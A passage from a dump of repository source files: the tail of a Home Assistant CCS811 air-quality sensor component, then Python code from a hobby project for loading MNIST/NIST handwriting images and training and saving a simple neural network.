3\nDEFAULT_I2C_SDA = 2\n\nMIN_TIME_BETWEEN_UPDATES = timedelta(seconds=3)\n\nCONF_HUMIDITY_SENSOR = 'humidity_sensor'\nCONF_TEMPERATURE_SENSOR = 'temperature_sensor'\n\nSENSOR_ECO2 = \"eco2\"\nSENSOR_TVOC = \"tvoc\"\nSENSOR_TYPES = {\n SENSOR_ECO2: [\"eCO2\", \"ppm\"],\n SENSOR_TVOC: [\"tVOC\", \"ppb\"],\n}\nDEFAULT_MONITORED = [SENSOR_ECO2, SENSOR_TVOC]\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Optional(CONF_HUMIDITY_SENSOR, default=None): vol.Coerce(cv.entity_id),\n vol.Optional(CONF_TEMPERATURE_SENSOR, default=None): vol.Coerce(cv.entity_id),\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),\n vol.Optional(CONF_MONITORED_CONDITIONS, default=DEFAULT_MONITORED): vol.All(\n cv.ensure_list, [vol.In(SENSOR_TYPES)]\n ),\n vol.Optional(CONF_I2C_SCL, default=DEFAULT_I2C_SCL): vol.Coerce(int),\n vol.Optional(CONF_I2C_SDA, default=DEFAULT_I2C_SDA): vol.Coerce(int)\n }\n)\n\n\nasync def async_setup_platform(hass, config, async_add_entities, discovery_info=None):\n name = config.get(CONF_NAME)\n i2c_address = config.get(CONF_I2C_ADDRESS)\n i2c_bus = busio.I2C(config.get(CONF_I2C_SCL), config.get(CONF_I2C_SDA))\n temperature_sensor_entity_id = config.get(CONF_TEMPERATURE_SENSOR)\n humidity_sensor_entity_id = config.get(CONF_HUMIDITY_SENSOR)\n\n sensor = await hass.async_add_job(\n partial(\n adafruit_ccs811.CCS811,\n i2c_bus=i2c_bus,\n address=i2c_address,\n )\n )\n\n sensor_handler = await hass.async_add_job(CCS811Handler, sensor)\n\n dev = []\n try:\n for variable in config[CONF_MONITORED_CONDITIONS]:\n dev.append(\n CCS811Sensor(sensor_handler, variable, name, temperature_sensor_entity_id, humidity_sensor_entity_id)\n )\n except KeyError:\n pass\n\n async_add_entities(dev, True)\n\n\nclass CCS811Handler:\n \"\"\"CCS811 sensor working in i2C bus.\"\"\"\n\n def __init__(self, sensor):\n \"\"\"Initialize the sensor handler.\"\"\"\n self.sensor = sensor\n self.temperature = None\n self.humitidy = None\n self.update()\n\n @Throttle(MIN_TIME_BETWEEN_UPDATES)\n def update(self):\n \"\"\"Update temperature and humidity compensation and read sensor data.\"\"\"\n if self.temperature != None and self.humidity != None:\n self.sensor.set_environmental_data(self.humidity, self.temperature)\n# Trim away error values.\n new_eco2 = self.sensor.eco2\n if new_eco2 < 65535:\n self.eco2 = new_eco2\n self.tvoc = self.sensor.tvoc\n\n def set_temperature(self, temperature):\n \"\"\"Set new target temperature.\"\"\"\n self.temperature = 
temperature\n\n def set_humidity(self, humidity):\n \"\"\"Set new target humidity.\"\"\"\n self.humidity = humidity\n\nclass CCS811Sensor(Entity):\n \"\"\"Implementation of the CCS811 sensor.\"\"\"\n\n def __init__(self, ccs811_client, sensor_type, name, temperature_sensor_entity_id, humidity_sensor_entity_id):\n \"\"\"Initialize the sensor.\"\"\"\n self.client_name = name\n self.temperature_sensor_entity_id = temperature_sensor_entity_id\n self.humidity_sensor_entity_id = humidity_sensor_entity_id\n self._name = SENSOR_TYPES[sensor_type][0]\n self.ccs811_client = ccs811_client\n self.type = sensor_type\n self._state = None\n self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]\n \n async def async_added_to_hass(self):\n \"\"\"Run when entity about to be added.\"\"\"\n await super().async_added_to_hass()\n\n # Add listener\n async_track_state_change(\n self.hass, self.temperature_sensor_entity_id, self._async_temperature_sensor_changed\n )\n async_track_state_change(\n self.hass, self.humidity_sensor_entity_id, self._async_humidity_sensor_changed\n )\n\n @callback\n def _async_startup(event):\n \"\"\"Init on startup.\"\"\"\n sensor_state_temperature = self.hass.states.get(self.temperature_sensor_entity_id)\n if sensor_state_temperature and sensor_state_temperature.state != STATE_UNKNOWN:\n self._async_update_temperature(sensor_state_temperature)\n\n sensor_state_humidity = self.hass.states.get(self.humidity_sensor_entity_id)\n if sensor_state_humidity and sensor_state_humidity.state != STATE_UNKNOWN:\n self._async_update_humidity(sensor_state_humidity)\n\n self.hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, _async_startup)\n\n\n async def _async_temperature_sensor_changed(self, entity_id, old_state, new_state):\n \"\"\"Handle temperature changes.\"\"\"\n if new_state is None:\n return\n\n self._async_update_temperature(new_state)\n\n @callback\n def _async_update_temperature(self, state):\n \"\"\"Update thermostat with latest state from sensor.\"\"\"\n try:\n self.ccs811_client.set_temperature(float(state.state))\n except ValueError as ex:\n _LOGGER.error(\"Unable to update from sensor: %s\", ex)\n\n async def _async_humidity_sensor_changed(self, entity_id, old_state, new_state):\n \"\"\"Handle humidity changes.\"\"\"\n if new_state is None:\n return\n\n self._async_update_humidity(new_state)\n\n @callback\n def _async_update_humidity(self, state):\n \"\"\"Update thermostat with latest state from sensor.\"\"\"\n try:\n self.ccs811_client.set_humidity(float(state.state))\n except ValueError as ex:\n _LOGGER.error(\"Unable to update from sensor: %s\", ex)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return f\"{self.client_name} {self._name}\"\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return self._state\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement of the sensor.\"\"\"\n return self._unit_of_measurement\n\n async def async_update(self):\n \"\"\"Get the latest data from the CCS811 and update the states.\"\"\"\n await self.hass.async_add_job(self.ccs811_client.update)\n if self.type == SENSOR_ECO2:\n eco2 = self.ccs811_client.eco2\n self._state = eco2\n elif self.type == SENSOR_TVOC:\n self._state = self.ccs811_client.tvoc\n\n"
}
] | 2 |
radiodee1/awesome-nnet | https://github.com/radiodee1/awesome-nnet | 5f16e11d8e1cf4d846f111c508aca5e4befc46f6 | b492df969ce9dff38e25f31bc9731b03b9e2b611 | b0f97571ec2aa30cc059b53b8e7fb7c80128da3d | refs/heads/master | 2021-05-29T12:37:53.130220 | 2015-08-23T19:53:29 | 2015-08-23T19:53:29 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4853312075138092,
"alphanum_fraction": 0.5073012113571167,
"avg_line_length": 33.780601501464844,
"blob_id": "fd26c3baea32821e2395d6d83c03dffcf108d0ec",
"content_id": "c2a9a7e0c2be39afd22b127be16685f17bf2bfe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15066,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 433,
"path": "/load_png_mnist.py",
"repo_name": "radiodee1/awesome-nnet",
"src_encoding": "UTF-8",
"text": "import numpy\n#import pylab\nfrom PIL import Image\nimport cPickle\nimport gzip\nimport os\nimport sys\nimport time\nimport random\n\nimport theano\nimport theano.tensor as T\n\nimport math\nfrom glob import glob\nfrom os.path import join\nfrom os.path import expanduser\nimport getpass\n#import pickle_local as plocal\n#import mnist_loader as mnistl\n#from enum_local import LOAD\n\ndef get_dataset(alphabet_set = False, \n test_only = False, \n img_pickle_ld = True, \n img_pickle_sv = True, \n nist_stretch = 2,\n large_size = -1 ,\n save_filename = \"\",\n randomize = False) :\n \n epochs = 10\n if (save_filename != \"\") :\n nist_stretch, large_size, epochs, save_filename , load , load_type = parse_filename(save_filename)\n if load :\n img_pickle_ld = True\n else :\n img_pickle_sv = False\n \n nist_num = nist_stretch * 1024 * 5 ## TOTAL IMG SPACE REQUESTED (images)\n if (large_size == -1) :\n large_size = 1024 * 10 * (28 * 28) ## LIMIT SIZE (not images)\n else:\n size = 28, 28\n img2 = numpy.zeros(shape=(size), dtype='float32')\n s = sys.getsizeof(img2)\n print(str(s) + \" size of 28x28\")\n if (large_size > s) : large_size = large_size / (s) ## (convert to num of images.)\n else : print (\"small 'BigBatch' size, using as num of images.\")\n rval_array = []\n pickle_len = 0\n obj = [[],0]\n dset = [[obj,obj,obj]]\n print(\"images requested: \" + str(nist_num))\n\n t1 = []\n l1 = []\n t2 = []\n l2 = []\n t3 = []\n l3 = []\n\n if img_pickle_ld and (not img_pickle_sv) and load_type != LOAD.NUMERIC :\n dset = plocal.load_pickle_img(save_filename);\n #for j in dset :\n pickle_len = len(dset[0][0][0] )\n \n pickle_len = int(pickle_len )\n print(pickle_len, nist_num)\n if pickle_len < nist_num : nist_num = pickle_len\n \n if nist_num > large_size:\n print(\"Automatically splitting input files.\")\n m = int(math.ceil(nist_num / float(large_size)))\n else:\n m = 1\n if (not img_pickle_sv) :\n \n for zz in range(m):\n print('get dataset. 
' + str(zz+1) + ' of ' + str(m))\n \n if (not alphabet_set) or load_type == LOAD.NUMERIC :\n t1,l1, files = batch_load(\"normpic\" , 1, 60000, randomize=randomize); ## 60000\n t2,l2, files = batch_load(\"normvalid\", 1, 5000, randomize = randomize);\n t3,l3 ,files = batch_load(\"normtest\", 1, 5000, randomize = randomize);\n print \"load numeric\"\n if alphabet_set and (not load_type == LOAD.NUMERIC) :\n \n stretch = int(nist_num / float(10)) \n \n if nist_num > large_size :\n stretch = int(large_size / float(10) )\n #print('middle')\n \n if nist_num > large_size and zz == m -1 : \n stretch = int (((nist_num ) - (zz * large_size ))/ float(10)) \n #print('end')\n \n if True : ##not img_pickle_sv : ## not nist_num == pickle_len and\n \n train_start = zz * large_size; # start with zero\n train_stop = train_start + (stretch * 8);\n valid_start = train_stop + 1;\n valid_stop = valid_start + (stretch * 1);\n test_start = valid_stop + 1;\n test_stop = test_start + (stretch * 1);\n\n \n if (not img_pickle_ld) and load_type != LOAD.NUMERIC :\n if not test_only :\n files = []\n t1, l1, files = batch_load_alpha( train_start, train_stop, randomize, files, load_type)\n t2, l2, files = batch_load_alpha( valid_start, valid_stop, randomize, files, load_type)\n \n else:\n t1 = l1 = t2 = l2 = files = []\n \n t3, l3 , files = batch_load_alpha( test_start, test_stop, randomize, files, load_type)\n \n \n elif img_pickle_ld :\n print('Loading pickle file: ~/workspace/nn/' + save_filename )\n print('delete this file to disable loading.')\n \n dset2 = dset[0][0]\n #print dset2[1]\n \n t1, l1 = dset2[0][train_start:train_stop] , dset2[1][train_start:train_stop]\n t2, l2 = dset2[0][valid_start:valid_stop] , dset2[1][valid_start:valid_stop]\n t3, l3 = dset2[0][test_start:test_stop] , dset2[1][test_start:test_stop]\n print('train: ' + str(len(l1)))\n print('valid: ' + str(len(l2)))\n print('test: ' + str(len(l3)))\n \n \n rval = [(t1, l1), (t2, l2), (t3, l3)]\n\n\n rval_array.append( rval )\n \n elif (not test_only) and img_pickle_sv :\n num_start = 0\n num_stop = nist_num\n t1, l1 , files = batch_load_alpha( num_start, num_stop, randomize=False, files = [], load_type=load_type)\n print('train: ' + str(len(l1)))\n \n #plocal.save_pickle_img( rval_array ,[],[], filename = save_filename );\n plocal.save_pickle_img( [[[t1, l1]]] ,[],[], filename = save_filename );\n print('\\nImage Pickle Save: only works for small image sets!')\n print('(it hogs memory and will freeze your computer.)')\n return rval_array , epochs, nist_stretch, load_type\n\n\t\ndef batch_load(basename = \"normpic\",\n series_start = 1, \n series_stop = 1, \n foldername = \"../oldpng-mnist/\",\n files = [],\n randomize = False):\n \n train_set = []\n train_num = []\n\n\n mnist = mnistl.MNIST(foldername)\n if basename == \"normpic\" :\n train_set, train_num = mnist.load_training()\n if basename == \"normtest\" :\n train_set, train_num = mnist.load_conv_test()\n if basename == \"normvalid\" :\n train_set, train_num = mnist.load_conv_valid()\n\n print \"len of mnist sets \" + str(len(train_num))\n if randomize :\n out_img = []\n out_num = []\n\n for ii in range(series_stop - series_start ) :\n\n k = random.randint(0, len(train_num) - 1)\n\n if True :\n for i in range(0, 28*28) :\n if train_set[k][i] > 100 :\n train_set[k][i] = 1\n else :\n train_set[k][i] = 0\n\n out_img.append(train_set[k])\n out_num.append(train_num[k])\n\n del train_set[k]\n del train_num[k]\n\n new_list = []\n if False :\n for jj in out_img:\n if isinstance(jj, list) :\n 
new_list.append(jj)\n print(\"----\")\n print(out_img)\n print(len(out_img))\n\n return out_img, out_num, files\n\n\n return train_set, train_num, files\n\t\ndef filename_list(series_start=0, series_stop=2, randomize = False , files = [] , load_type = 0):\n \n if len(files) == 0 :\n files = []\n folder = 'F*'\n #folder_username = getpass.getuser()\n home = expanduser(\"~\")\n \n #print(folder)\n g = glob(join(home ,'workspace','sd_nineteen','HSF_0',folder))\n h = glob(join(home ,'workspace','sd_nineteen','HSF_1',folder))\n g.extend(h)\n i = glob(join(home ,'workspace','sd_nineteen','HSF_2',folder))\n g.extend(i)\n jj = glob(join(home ,'workspace','sd_nineteen','HSF_3',folder))\n g.extend(jj)\n kk = glob(join(home ,'workspace','sd_nineteen','HSF_4',folder))\n g.extend(kk)\n ll = glob(join(home ,'workspace','sd_nineteen','HSF_6',folder))\n g.extend(ll)\n mm = glob(join(home ,'workspace','sd_nineteen','HSF_7',folder))\n g.extend(mm)\n g.sort()\n \n #print (\"sorted folder list: \", len(g))\n for j in g : #range(series_start, series_stop):\n gg = glob(join( j ,'*.bmp'))\n #print (\"list: \",gg)\n files.extend(gg)\n print ('loadable files: '+ str(len(files)))\n print ('loaded files : ' + str(int(series_stop - series_start)))\n files.sort()\n output = []\n if not randomize :\n output = files[int(series_start): int(series_stop) ]\n else :\n print len(files)\n num_files = int( series_stop - series_start )\n for j in range(num_files) :\n digit_start = 48\n k = random.randint(0, len(files))\n xxx, d = get_number(files[k], load_type)\n\n while d >= digit_start and d < digit_start + 10 and load_type == LOAD.ALPHA :\n #print d - digit_start\n del files[k]\n k = random.randint(0, len(files))\n xxx, d = get_number(files[k], load_type)\n\n xxx, d = get_number(files[k], load_type)\n if d >= digit_start and d < digit_start + 10 and load_type == LOAD.ALPHA:\n print \"file error number detected\"\n exit()\n #if j is 0 : print files[k]\n output.append(files[k])\n del files[k]\n \n return output, files\n \n\t\ndef batch_load_alpha(series_start = 1, series_stop = 1, randomize = False, files = [], load_type =0):\n img_list , files = filename_list(series_start, series_stop, randomize, files, load_type )\n train_set = []\n train_num = []\n oneimg = []\n oneindex = 0\n i = 0\n if (len(img_list) > 0) and True:\n print('sample: ' + img_list[0])\n sys.stdout.flush()\n \n for filename in img_list:\n\n oneimg, oneindex = look_at_img(filename, load_type=load_type)\n train_set.append(oneimg)\n train_num.append(oneindex)\n #print(filename)\n return train_set, train_num, files\n\ndef look_at_img( filename , i = 0, load_type =0):\n img = Image.open(open( filename ))\n size = 28, 28\n img2 = numpy.zeros(shape=(size), dtype='float64')\n oneimg = []\n oneindex = i\n xy_list = []\n \n img = numpy.asarray(img, dtype='float64')\n marker = 0\n ''' Detect 0 for black -- put in list in shrunk form. '''\n for x in range(0,len(img)):\n for y in range(0, len(img)):\n if (float(img[x,y,0]) < 255) is True:\n xy_list.append([x* 1/float(2) - 18,y * 1/float(2) - 18])\n \n ''' Put list in 28 x 28 array. '''\n if len(xy_list) == 0 :\n xy_list = [0,0]\n for q in xy_list :\n if (q[0] < 28) and (q[1] < 28) and (q[0] >= 0) and (q[1] >= 0):\n #print (q[0], q[1])\n img2[int(math.floor(q[0])), int(math.floor(q[1]))] = 1\n \n ''' Then add entire array to oneimg variable and flatten.'''\n for x in range(28) :\n for y in range(28) :\n oneimg.append(img2[x,y])\n \n ''' Get the image ascii number from the filename. 
'''\n oneindex , unused = get_number(filename, load_type)\n return oneimg, oneindex\n\ndef get_number(filename, load_type ):\n mat = ascii_matrix(load_type)\n newindex = 0\n index = 0\n l_bmp = len('.bmp') ## discard this many chars for ending\n l_sample = l_bmp + 2 ## sample two chars\n \n l_filename = len(filename)\n filename = filename[l_filename - l_sample : l_filename - l_bmp] ## slice\n if filename[0:1] is '_':\n filename = filename[1: len(filename)] ## slice again\n ## consume first char.\n filename = '0x' + filename\n index = int(filename, 16) ## translate hex to int\n for i in range(len(mat)) :\n if index is mat[i][0] :\n newindex = i\n return newindex, index\n\ndef ascii_matrix(alphabet_set ) :\n mat = []\n a_upper = 65 ## ascii for 'A'\n a_lower = 97 ## ascii for 'a'\n z_digit = 48 ## ascii for '0'\n \n if alphabet_set == LOAD.ALPHANUMERIC or alphabet_set == LOAD.ALPHA :\n for i in range(0,26):\n value = int(a_upper + i) , str(unichr(a_upper+i))\n mat.append(value)\n for i in range(0,26):\n value = int(a_lower + i) , str(unichr(a_lower+i))\n mat.append(value)\n\n if alphabet_set == LOAD.ALPHANUMERIC or alphabet_set == LOAD.NUMERIC : ## do not seperate nums and alphabet yet.\n for i in range(0,10):\n value = int(z_digit + i) , str(unichr(z_digit+i))\n mat.append(value)\n if len(mat) == 0 :\n print (\"load type \" + str(alphabet_set)), LOAD.ALPHA , LOAD.NUMERIC, LOAD.ALPHANUMERIC\n raise RuntimeError\n #print(len(mat))\n return mat\n\n\ndef shared_dataset(data_xy, borrow=True):\n data_x, data_y = data_xy\n shared_x = theano.shared(numpy.asarray(data_x,\n dtype=theano.config.floatX),\n borrow=borrow)\n shared_y = theano.shared(numpy.asarray(data_y,\n dtype=theano.config.floatX), \n borrow=borrow)\n return shared_x, T.cast(shared_y, 'int32')\n\ndef show_xvalues(xarray = [[]], index = 0):\n print (\"show x values \" + str(index))\n xx = xarray[index]\n ln = int(math.floor(math.sqrt(len(xx)))) \n #print (ln)\n for x in range(1,ln):\n for y in range(1, ln):\n zzz = '#'\n #zzz =int( xx[x* ln + y])\n if int(xx[ x* ln + y]) == int( 0) : \n zzz = '.'\n #print(zzz) \n sys.stdout.write(zzz)\n print(\"\");\n print (\"\\n===========================\\n\")\n\ndef parse_filename(filename=\"\"):\n nist_stretch = 2\n large_size = 1\n epochs = 10\n split_filename = filename.split(\"/\")\n save_filename = split_filename[len(split_filename) - 1]\n tag1 = \"save\"\n tag2 = \"x5K-images\"\n tag3 = \"GB-limit\"\n tag4 = \"epochs.save\"\n tag5 = \"run\" ## IMPLIED ALPHA-NUMERIC!!\n tag6 = \"alpha\"\n tag7 = \"numeric\"\n s = save_filename.split(\"_\")\n #print(s)\n load = False\n\n load_type = 0\n g = s[0].split(\"-\")\n s[0] = g[0]\n if len(g) == 1 :\n load_type = LOAD.ALPHANUMERIC\n print(\"load both\")\n elif g[1] == tag6 :\n load_type = LOAD.ALPHA\n print(\"load alpha\")\n elif g[1] == tag7 :\n load_type = LOAD.NUMERIC\n print(\"load numeric\")\n\n if ( s[0] == tag1 and s[2] == tag2 and s[4] == tag3 and s[6] == tag4) :\n nist_stretch = int(s[1].strip())\n large_size = int(float(s[3].strip()) * float(math.pow(2,30)) ) #1000000000\n epochs = int(s[5].strip())\n load = True\n elif (s[0] == tag5 and s[2] == tag2 and s[4] == tag3 and s[6] == tag4) :\n nist_stretch = int(s[1].strip())\n large_size = int(float(s[3].strip()) * float(math.pow(2,30)) ) #1000000000\n epochs = int(s[5].strip())\n else :\n print(\"Poorly formed file name!\")\n exit();\n return nist_stretch, large_size, epochs, save_filename, load , load_type;\n \n\n"
},
{
"alpha_fraction": 0.4588913917541504,
"alphanum_fraction": 0.46651676297187805,
"avg_line_length": 40.75101852416992,
"blob_id": "cf5e97b409bf8e03a3b5128fd5fc2d486a17934a",
"content_id": "50d277cc499699004c3060309f9ab5410cc9c384",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10229,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 245,
"path": "/nnet/neuralnetwork.py",
"repo_name": "radiodee1/awesome-nnet",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport scipy as sp\nimport cPickle, os\nfrom .layers import ParamMixin\nfrom .helpers import one_hot, unhot\nimport enum_local as LOAD\nimport datetime\nimport store\n\nclass NeuralNetwork:\n def __init__(self, layers, rng=None):\n self.layers = layers\n if rng is None:\n rng = np.random.RandomState()\n self.rng = rng\n self.name = \"mnist\"\n self.interrupt = False\n self.android_load = False\n self.nn_dir = \"../nn-best/\"\n\n def _setup(self, X, Y):\n # Setup layers sequentially\n next_shape = X.shape\n for layer in self.layers:\n layer._setup(next_shape, self.rng)\n next_shape = layer.output_shape(next_shape)\n# print(next_shape)\n if next_shape != Y.shape:\n raise ValueError('Output shape %s does not match Y %s'\n % (next_shape, Y.shape))\n\n def fit(self, X, Y, learning_rate=0.1, max_iter=10, batch_size=64, name=\"mnist\", load_type = LOAD.NUMERIC):\n \"\"\" Train network on the given data. \"\"\"\n self.name = name\n \n stamp = str(\" -- start stamp -- \") \n self.append_status(name=name, message=stamp)\n \n n_samples = Y.shape[0]\n n_batches = n_samples // batch_size\n Y_one_hot = one_hot(Y , load_type=load_type)\n self._setup(X, Y_one_hot)\n self.load_file(name=name)\n iter = 0\n # Stochastic gradient descent with mini-batches\n while iter < max_iter:\n iter += 1\n for b in range(n_batches):\n \n message = (str(b + 1) + \" of \" + str(n_batches) +\" batches (batch size=\"+str(batch_size)+\"), iter \" \n + str(iter) + \" with total of \"+ str(max_iter))\n self.append_status(name=name, message=message)\n batch_begin = b*batch_size\n batch_end = batch_begin+batch_size\n X_batch = X[batch_begin:batch_end]\n Y_batch = Y_one_hot[batch_begin:batch_end]\n\n # Forward propagation\n X_next = X_batch\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = X_next\n\n # Back propagation of partial derivatives\n next_grad = self.layers[-1].input_grad(Y_batch, Y_pred)\n for layer in reversed(self.layers[:-1]):\n next_grad = layer.bprop(next_grad)\n\n # Update parameters\n for layer in self.layers:\n if isinstance(layer, ParamMixin):\n for param, inc in zip(layer.params(),\n layer.param_incs()):\n param -= learning_rate*inc\n \n modconst = 5\n modnum = (b+1) % modconst\n #print modnum\n if b+1 > 1 and modnum == 0 :\n if self.interrupt:\n message = (\"Interrupt for training status...\")\n self.append_status(name=self.name, message = message)\n self.status(iter,X,Y,Y_one_hot)\n else :\n message = (\"periodic save...\")\n self.append_status(name=self.name, message = message)\n self.save_file(name=self.name)\n \n self.status(iter,X,Y,Y_one_hot) ##end\n \n def status(self, iter,X,Y,Y_one_hot):\n # Output training status\n print(\"\\nfind loss and error \" + str(len(X)))\n loss = self._loss(X, Y_one_hot)\n error = self.error(X, Y)\n message = str('iter %i, loss %.4f, train error %.4f - %i imgs' % (iter, loss, error, len(X)))\n self.append_status(name=self.name, message = message)\n if iter > 0 : self.save_file(name=self.name)\n\n def _loss(self, X, Y_one_hot):\n X_next = X\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = X_next\n return self.layers[-1].loss(Y_one_hot, Y_pred)\n\n def predict(self, X):\n \"\"\" Calculate an output Y for the given input X. \"\"\"\n X_next = X\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = unhot(X_next)\n return Y_pred\n\n def error(self, X, Y):\n \"\"\" Calculate error on the given data. 
\"\"\"\n Y_pred = self.predict(X)\n error = Y_pred != Y\n return np.mean(error)\n\n def set_interrupt(self,interrupt):\n self.interrupt = interrupt\n \n def set_name(self,name):\n self.name = name\n \n def set_android_load(self,val) :\n self.android_load = val\n\n def check_gradients(self, X, Y):\n \"\"\" Helper function to test the parameter gradients for\n correctness. \"\"\"\n # Warning: the following is a hack\n print \"check gradients...\"\n Y_one_hot = one_hot(Y) ## this line needs a load_type!!\n self._setup(X, Y_one_hot)\n for l, layer in enumerate(self.layers):\n if isinstance(layer, ParamMixin):\n print('layer %d' % l)\n for p, param in enumerate(layer.params()):\n param_shape = param.shape\n\n def fun(param_new):\n param[:] = np.reshape(param_new, param_shape)\n return self._loss(X, Y_one_hot)\n\n def grad_fun(param_new):\n param[:] = np.reshape(param_new, param_shape)\n # Forward propagation\n X_next = X\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = X_next\n\n # Back-propagation of partial derivatives\n next_grad = self.layers[-1].input_grad(Y_one_hot,\n Y_pred)\n for layer in reversed(self.layers[l:-1]):\n next_grad = layer.bprop(next_grad)\n return np.ravel(self.layers[l].param_grads()[p])\n\n param_init = np.ravel(np.copy(param))\n err = sp.optimize.check_grad(fun, grad_fun, param_init)\n print('diff %.2e' % err)\n \n def save_file(self, name = \"mnist\"):\n print (\"saving \" + name)\n W = []\n b = []\n level = 0\n for layer in self.layers:\n level += 1\n if isinstance(layer, ParamMixin):\n W, b = layer.params()\n \n if not self.android_load :\n shapew1 = str(self.nn_dir+name+'_shape_w'+str(level)+'.txt')\n np.savetxt(shapew1, W.shape)\n shapeb1 = str(self.nn_dir+name+'_shape_b'+str(level)+'.txt')\n np.savetxt(shapeb1, b.shape)\n textw1 = str(self.nn_dir+name+'_w'+str(level)+'.txt')\n Wout, xshape = store.store_w(W)\n np.savetxt(textw1, Wout)\n textb1 = str(self.nn_dir+name+'_b'+str(level)+'.txt')\n bout , xshape = store.store_b(b)\n np.savetxt(textb1, bout)\n print (str (level) + \" save.\")\n if False:\n # pickle W and b\n f1 = file(str(self.nn_dir+name+'-weights'+ str(level) +'.save'), 'wb')\n cPickle.dump(W, f1, protocol=cPickle.HIGHEST_PROTOCOL)\n f1.close()\n f2 = file(str(self.nn_dir+name+'-bias'+ str(level) +'.save'), 'wb')\n cPickle.dump(b, f2, protocol=cPickle.HIGHEST_PROTOCOL)\n f2.close()\n \n \n \n def load_file(self, name = \"mnist\"):\n #print len(self.layers)\n for i in range(len(self.layers)):\n if isinstance(self.layers[i], ParamMixin):\n if False: ## convert old pickle files to new format...\n path1 = str(self.nn_dir+name+\"-weights\" + str(i+1) + \".save\")\n if os.path.exists(path1):\n f1 = file(path1, 'rb')\n loaded_obj1 = cPickle.load(f1)\n f1.close()\n self.layers[i].W = loaded_obj1\n print (\"load \" + path1)\n path2 = str(self.nn_dir+name+\"-bias\" + str(i+1) + \".save\")\n if os.path.exists(path2):\n f2 = file(path2, 'rb')\n loaded_obj2 = cPickle.load(f2)\n f2.close()\n self.layers[i].b = loaded_obj2\n print (\"load \" + path2)\n \n if not self.android_load :\n ## load text files...\n textw1 = str(self.nn_dir+name+'_w'+str(i+1)+'.txt')\n shapew1 = str(self.nn_dir+name+'_shape_w'+str(i+1)+'.txt')\n if os.path.exists(textw1) and os.path.exists(shapew1):\n wshape = np.loadtxt(shapew1)\n wtext = np.loadtxt(textw1)\n self.layers[i].W = store.unstore_w(wtext, wshape)\n print 'w' + str(i+1)\n textb1 = str(self.nn_dir+name+'_b'+str(i+1)+'.txt')\n shapeb1 = str(self.nn_dir+name+'_shape_b'+str(i+1)+'.txt')\n if os.path.exists(textb1) 
and os.path.exists(shapeb1) :\n bshape = np.loadtxt(shapeb1)\n btext = np.loadtxt(textb1)\n self.layers[i].b = store.unstore_b(btext, bshape)\n print 'b' + str(i+1)\n elif self.android_load :\n pass\n \n def append_status(self, name, message):\n print (message)\n time = \"[\" + str(datetime.datetime.now()) + \"]\"\n message = time + \" \" + message + \"\\n\"\n filename = \"status-\" + name.strip() +\".txt\"\n f = open(filename, 'a')\n f.write(message)\n f.close()\n"
},
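The save_file/load_file pair in neuralnetwork.py above persists each layer's W and b by flattening them with store.store_w/store_b, writing both the flattened data and the original shape through np.savetxt, and reversing the process with np.loadtxt plus a reshape. A minimal, self-contained sketch of that round trip (file names here are illustrative, not the script's nn-best paths):

    import numpy as np

    W = np.arange(24, dtype=float).reshape(2, 3, 4)     # toy weight tensor

    np.savetxt("demo_w.txt", np.reshape(W, (1, -1)))    # store_w: flatten to one row
    np.savetxt("demo_shape_w.txt", W.shape)             # keep the original shape

    shape = np.loadtxt("demo_shape_w.txt").astype(int)  # loadtxt yields floats
    W2 = np.reshape(np.loadtxt("demo_w.txt"), shape)    # unstore_w: restore shape
    assert np.array_equal(W, W2)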
{
"alpha_fraction": 0.4034048914909363,
"alphanum_fraction": 0.4293116331100464,
"avg_line_length": 22.701753616333008,
"blob_id": "ca4aed3d26122dd04de70c31d109d24184a1394f",
"content_id": "2715ad4d15547aa14a8e9d2feccfd9729a4375ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1351,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 57,
"path": "/nnet/store.py",
"repo_name": "radiodee1/awesome-nnet",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\n\ndef store_w(w):\n return np.reshape(w,(1,-1)), w.shape ##store(w)\n \n \ndef store_b(b):\n return np.reshape(b,(1,-1)), b.shape ##store(b)\n \n \ndef unstore_w(s, shape):\n w = np.reshape(s, shape)\n return w\n \n \ndef unstore_b(s, shape):\n b = np.reshape(s, shape)\n return b\n \n \n################## just test stuff here ##################\ndef store(x):\n shape = x.shape\n #print 'shape', shape\n #ln = len(shape)\n out = []\n \n for i in x:\n if isinstance(i, (list, np.ndarray, tuple)):\n for j in i:\n #print 'j', j\n if isinstance(j, (list, np.ndarray, tuple)) :\n for k in j:\n if isinstance(k, (list, np.ndarray, tuple)):\n for m in k:\n out.append(m)\n #print 'm',m\n else: out.append(k)\n else: out.append(j)\n else :out.append(i)\n \n return out, shape\n \n \nif __name__ == '__main__':\n shape = (4,3,2,2)\n x = np.zeros(shape=(4,3,2,2))\n z = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])\n shape2 = z.shape\n print z, shape2\n z2 , s = store(z)\n \n print z2\n z2 = unstore_w(z2, shape2)\n print z2\n"
}
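The hand-written store() in store.py walks up to four levels of nesting to flatten an array; for any ndarray, NumPy's ravel produces the same element order in one call, and reshape undoes it. A quick equivalence check using the array from store.py's own __main__ block:

    import numpy as np

    z = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]])

    flat = np.ravel(z)                   # same element order store(z) builds
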